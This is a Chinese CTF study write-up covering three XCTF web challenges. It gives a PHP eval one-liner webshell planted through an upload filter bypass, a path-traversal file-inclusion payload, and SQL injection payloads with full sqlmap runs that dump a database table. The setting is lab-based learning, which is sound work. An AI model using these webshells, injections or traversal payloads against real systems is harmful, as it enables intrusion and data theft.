Web安全
周记(5)
—题解
文章目录
前言
三题均来自攻防世界WEB高手进阶区。
一、知识补充
①输出关于 PHP 配置信息的命令:
<?php phpinfo();?>
②PHP一句话木马:
<?php @eval($_POST[a]); ?>
③sqlmap中的命令:
 POST请求指定参数注入:
sqlmap -u http://111.200.241.244:58877 --data "search=df"
获取指定数据库信息:
sqlmap -u http://111.200.241.244:58877/ --data "search=df" -dbs
获取指定数据库下的所有表的信息:
sqlmap -u http://111.200.241.244:58877/ --data "search=df" -D news --tables
获取指定数据库下指定表的所有字段:
sqlmap -u http://111.200.241.244:58877 --data "search=df" -D news -T secret_table --columns
获取指定数据库下指定表的指定字段的所有信息:
sqlmap -u http://111.200.241.244:58877/ --data "search=df" -D news -T secret_table -C "fl4g" --dump
④mysql数据库结构:
数据库~网站~数据库用户
表名
     列名
           数据
           
二、做题
1.warmup
题目描述:
题目来源: HCTF 2018
 
解题思路:
常规思路,先打开页面源代码。
  发现可疑的
发现可疑的<!--source.php-->,随即构造payload查看。
  发现PHP源代码,和可疑的
发现PHP源代码,和可疑的hint.php,构造payload查看。
  由页面提示,猜测
由页面提示,猜测ffffllllaaaagggg是flag文件名。
 接着进行代码审计。
 <?php
    highlight_file(__FILE__);
    class emmm//定义一个emmm类。
    {
        public static function checkFile(&$page)//定义一个checkFile函数。
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//定义了白名单列表。
            if (! isset($page) || !is_string($page)) {//isset()判断变量是否声明;is_string()判断变量是否是字符串。
                echo "you can't see it";
                return false;
            }
            if (in_array($page, $whitelist)) {//第一次检测传进来的值是否匹配白名单列表$whitelist。
                return true;
            }
            $_page = mb_substr(//第一次过滤问号(如果$page的值有? 则从?之前提取字符串)。
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {//第二次检测传进来的值是否匹配白名单列表$whitelist。
                return true;
            }
            $_page = urldecode($page);//url对$page解码。
            $_page = mb_substr(//第二次过滤问号。
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {//第三次检测传进来的值是否匹配白名单列表$whitelist。
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
    if (! empty($_REQUEST['file'])//要求file变量不为空。
        && is_string($_REQUEST['file'])//要求传进来的值是字符串类型。
        && emmm::checkFile($_REQUEST['file'])//将值传到emmm类里面的checkFile函数。
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?> 
因此cehckFile函数总共进行了 3次白名单检测、 2次问号过滤、1次URL解码。
 构造payload的思路为:file进入checkFile函数先经历第一次白名单验证和一次问号过滤,之后就是hint.php,然后再进行一次白名单验证 ,返回为真,所以过程需要将目录回退四次,则达成条件执行include函数得到flag。
 所以构造新的payload:
http://111.200.241.244:50880/index.php?file=hint.php?../../../../../ffffllllaaaagggg

最终可获得flag为flag{25e7bce6005c4e0c983fb97297ac6e5a}。
2.NewsCenter
题目描述:
题目来源: XCTF 4th-QCTF-2018
 
解题思路:
只有一个输入框,尝试使用SQL注入:1' union select 1,2,3#。
  此时发现2,3处的确有注入点,随即使用sqlmap工具进行SQL注入。
此时发现2,3处的确有注入点,随即使用sqlmap工具进行SQL注入。
 先用sqlmap -u http://111.200.241.244:58877 --data "search=df"命令,获取注入点。
D:\sqlmap\sqlmap-master>python sqlmap.py -u http://111.200.241.244:58877 --data "search=df"
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.3.19#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:05:59 /2022-04-25/
[17:05:59] [INFO] testing connection to the target URL
[17:05:59] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:05:59] [INFO] testing if the target URL content is stable
[17:06:00] [INFO] target URL content is stable
[17:06:00] [INFO] testing if POST parameter 'search' is dynamic
[17:06:00] [WARNING] POST parameter 'search' does not appear to be dynamic
[17:06:00] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[17:06:00] [INFO] testing for SQL injection on POST parameter 'search'
[17:06:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:06:00] [WARNING] reflective value(s) found and filtering out
[17:06:01] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:06:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:06:01] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:06:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[17:06:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:06:02] [INFO] testing 'Generic inline queries'
[17:06:02] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[17:06:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[17:06:03] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[17:06:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:06:13] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[17:06:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:06:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:06:26] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:06:26] [INFO] target URL appears to have 3 columns in query
[17:06:27] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=df' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))qSnW) AND 'fMwN'='fMwN
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=df' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7171,0x484a66556b49525552635047527944457953756747506444764d50526f76666a52544273664c7748,0x717a787071)-- -
---
[17:06:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[17:06:33] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 26 times
[17:06:33] [INFO] fetched data logged to text files under 'C:\Users\熙、味\AppData\Local\sqlmap\output\111.200.241.244'
[*] ending @ 17:06:33 /2022-04-25/
再用sqlmap -u http://111.200.241.244:58877/ --data "search=df" -dbs命令,获取数据库信息。
D:\sqlmap\sqlmap-master>python sqlmap.py -u http://111.200.241.244:58877/ --data "search=df" -dbs
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.3.19#dev}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:14:02 /2022-04-25/
[17:14:02] [INFO] resuming back-end DBMS 'mysql'
[17:14:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=df' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))qSnW) AND 'fMwN'='fMwN
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=df' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7171,0x484a66556b49525552635047527944457953756747506444764d50526f76666a52544273664c7748,0x717a787071)-- -
---
[17:14:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[17:14:03] [INFO] fetching database names
[17:14:03] [WARNING] reflective value(s) found and filtering out
available databases [2]:
[*] information_schema
[*] news
[17:14:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:14:03] [INFO] fetched data logged to text files under 'C:\Users\熙、味\AppData\Local\sqlmap\output\111.200.241.244'
[*] ending @ 17:14:03 /2022-04-25/
接着用sqlmap -u http://111.200.241.244:58877/ --data "search=df" -D news --tables命令,获取 news 数据库内表的信息。
D:\sqlmap\sqlmap-master>python sqlmap.py -u http://111.200.241.244:58877/ --data "search=df" -D news --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.3.19#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:16:48 /2022-04-25/
[17:16:48] [INFO] resuming back-end DBMS 'mysql'
[17:16:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=df' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))qSnW) AND 'fMwN'='fMwN
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=df' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7171,0x484a66556b49525552635047527944457953756747506444764d50526f76666a52544273664c7748,0x717a787071)-- -
---
[17:16:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[17:16:48] [INFO] fetching tables for database: 'news'
[17:16:48] [WARNING] reflective value(s) found and filtering out
Database: news
[2 tables]
+--------------+
| news         |
| secret_table |
+--------------+
[17:16:48] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:16:48] [INFO] fetched data logged to text files under 'C:\Users\熙、味\AppData\Local\sqlmap\output\111.200.241.244'
[*] ending @ 17:16:48 /2022-04-25/
然后用sqlmap -u http://111.200.241.244:58877 --data "search=df" -D news -T secret_table --columns命令,获取 news 数据库下 secret_table 表内的字段信息。
D:\sqlmap\sqlmap-master>python sqlmap.py -u http://111.200.241.244:58877 --data "search=df" -D news -T secret_table --columns
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.3.19#dev}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:18:41 /2022-04-25/
[17:18:41] [INFO] resuming back-end DBMS 'mysql'
[17:18:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=df' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))qSnW) AND 'fMwN'='fMwN
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=df' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7171,0x484a66556b49525552635047527944457953756747506444764d50526f76666a52544273664c7748,0x717a787071)-- -
---
[17:18:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[17:18:41] [INFO] fetching columns for table 'secret_table' in database 'news'
[17:18:41] [WARNING] reflective value(s) found and filtering out
Database: news
Table: secret_table
[2 columns]
+--------+------------------+
| Column | Type             |
+--------+------------------+
| fl4g   | varchar(50)      |
| id     | int(10) unsigned |
+--------+------------------+
[17:18:41] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:18:41] [INFO] fetched data logged to text files under 'C:\Users\熙、味\AppData\Local\sqlmap\output\111.200.241.244'
[*] ending @ 17:18:41 /2022-04-25/
最后用sqlmap -u http://111.200.241.244:58877/ --data "search=df" -D news -T secret_table -C "fl4g" --dump命令,获取 news 数据库下 secret_table 表内 fl4g 字段内容。
D:\sqlmap\sqlmap-master>python sqlmap.py -u http://111.200.241.244:58877/ --data "search=df" -D news -T secret_table -C "fl4g" --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.3.19#dev}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:20:26 /2022-04-25/
[17:20:27] [INFO] resuming back-end DBMS 'mysql'
[17:20:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=df' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))qSnW) AND 'fMwN'='fMwN
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=df' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7171,0x484a66556b49525552635047527944457953756747506444764d50526f76666a52544273664c7748,0x717a787071)-- -
---
[17:20:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[17:20:27] [INFO] fetching entries of column(s) 'fl4g' for table 'secret_table' in database 'news'
[17:20:27] [WARNING] reflective value(s) found and filtering out
Database: news
Table: secret_table
[1 entry]
+--------------------------+
| fl4g                     |
+--------------------------+
| QCTF{sq1_inJec7ion_ezzz} |
+--------------------------+
[17:20:27] [INFO] table 'news.secret_table' dumped to CSV file 'C:\Users\熙、味\AppData\Local\sqlmap\output\111.200.241.244\dump\news\secret_table.csv'
[17:20:27] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[17:20:27] [INFO] fetched data logged to text files under 'C:\Users\熙、味\AppData\Local\sqlmap\output\111.200.241.244'
[*] ending @ 17:20:27 /2022-04-25/
最终成功获得flag为QCTF{sq1_inJec7ion_ezzz}。
3.upload1
题目描述:

解题思路:
先尝试上传任意文件。 发现题目要求必须是图片文件,猜测可能是文件上传漏洞,先提前在一个jpg文件里编辑好一系列可能触发漏洞的php命令:显示php配置、一句话木马。
发现题目要求必须是图片文件,猜测可能是文件上传漏洞,先提前在一个jpg文件里编辑好一系列可能触发漏洞的php命令:显示php配置、一句话木马。
<?php phpinfo();?><?php @eval($_POST[a]); ?>
 然后进行文件上传,此时上传的是jpg格式,目的是为了绕过过滤。
然后进行文件上传,此时上传的是jpg格式,目的是为了绕过过滤。
 但为了让php命令执行,需要在上传时进行抓包,并将“111.jpg”改成“111.php”。
  放包后,页面提示上传成功。
放包后,页面提示上传成功。
  紧接着,构造payload,通过返回页面显示php配置信息,验证了php命令已成功执行。
紧接着,构造payload,通过返回页面显示php配置信息,验证了php命令已成功执行。
 连接中国蚁剑,配置URL地址和密码。
连接中国蚁剑,配置URL地址和密码。
 URL地址:http://111.200.241.244:51440/upload/1650899544.111.php
 密码:a

 进入页面,发现flag.php文件。
  打开即可获得flag:
打开即可获得flag:cyberpeace{1dc58753145929012a884577c6888f61}。
 
总结
以上就是本周主要题解内容,主要涉及文件上传漏洞语句(PHP一句话木马、PHP配置信息命令)、sqlmap中的一系列命令(POST请求指定参数注入、获取指定数据库信息、获取指定数据库下的所有表的信息、获取指定数据库下指定表的所有字段、获取指定数据库下指定表的指定字段的所有信息)、PHP代码审计、SQL注入等知识点,和中国蚁剑、burpsuite、sqlmap等工具的使用。










